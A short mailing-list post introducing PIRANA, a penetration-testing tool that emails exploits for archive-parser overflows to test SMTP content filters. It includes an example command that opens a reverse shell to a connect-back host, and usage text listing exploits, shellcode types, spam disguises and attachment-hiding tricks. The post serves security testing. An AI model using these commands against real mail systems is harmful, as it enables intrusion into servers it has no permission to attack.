Pirana PIRANA is a penetration testing framework to help in checking a SMTP content filter's security. It works by attaching an exploit to an email, optionally disguising it from content filters. PIRANA also lets you choose from different type of shellcodes to use and has various options to be stealthy.
http://www.guay-leroux.com/projects/SMTP%20content%20filters.pdf http://backtrack.offensive-security.com/index.php/Tools#Pirana Posted Last Year at Xmas to PLUG Archives from Backtrack2 (obfuscated without full links or correct pirana.pl spelling): http://www.mail-archive.com/plug-discuss@lists.plug.phoenix.az.us/msg08695.html The Bt2 HowTo: http://www.linuxhaxor.net/?p=337 Solutions to protect include clamav/spamassassin but this could depend on your spamassassin and other installation specifics. Pirana.pl example: Connect back with a reverse shell just by sending an email using cloaking. $ pirana.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a [EMAIL PROTECTED] Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS] Mandatory arguments: -e+ Exploit number to use (See below) -h+ SMTP server to test -a+ Destination email address used in probing Optional arguments: -s+ Shellcode type to inject into exploits (See below) -c+ Cloaking style (See below) -d+ Try to vanish attachments from MUA's view (See below) -v Attach EICAR virus to improve stealthness -z Pack all the malware into a tarball to be less noisy -p+ Port to use in reverse shell or bind shell -l+ Host to connect back in reverse shell mode Valid exploits numbers: 0 OSVDB #5753: LHA get_header File Name Overflow 1 OSVDB #5754: LHA get_header Directory Name Overflow 2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow 3 OSVDB #11695: unarj Filename Handling Overflow 4 OSVDB #23460: ZOO combine File and Dir name overflow 5 OSVDB #15867: Convert UUlib uunconc integer overflow 6 OSVDB #XXX: ZOO next offset infinite loop DoS Valid shellcode types: 0 TCP reverse shell 1 UDP reverse shell 2 TCP bind shell Valid cloaking styles (consult whitepaper for visual result): 0 No cloaking at all (default) 1 Viagra spam message 2 "Look at the pictures I promised you!" Vanishing techniques for attachments: 0 No vanishing at all (default) 1 Multipart/alternative trick 2 <img src="image.JPG" width=0 height=0> trick Test Test Test! Merry merry merry! -- Skype: (623)239-3392 AT&T: (503)754-4452 http://uncyclopedia.wikia.com/wiki/Santa --------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
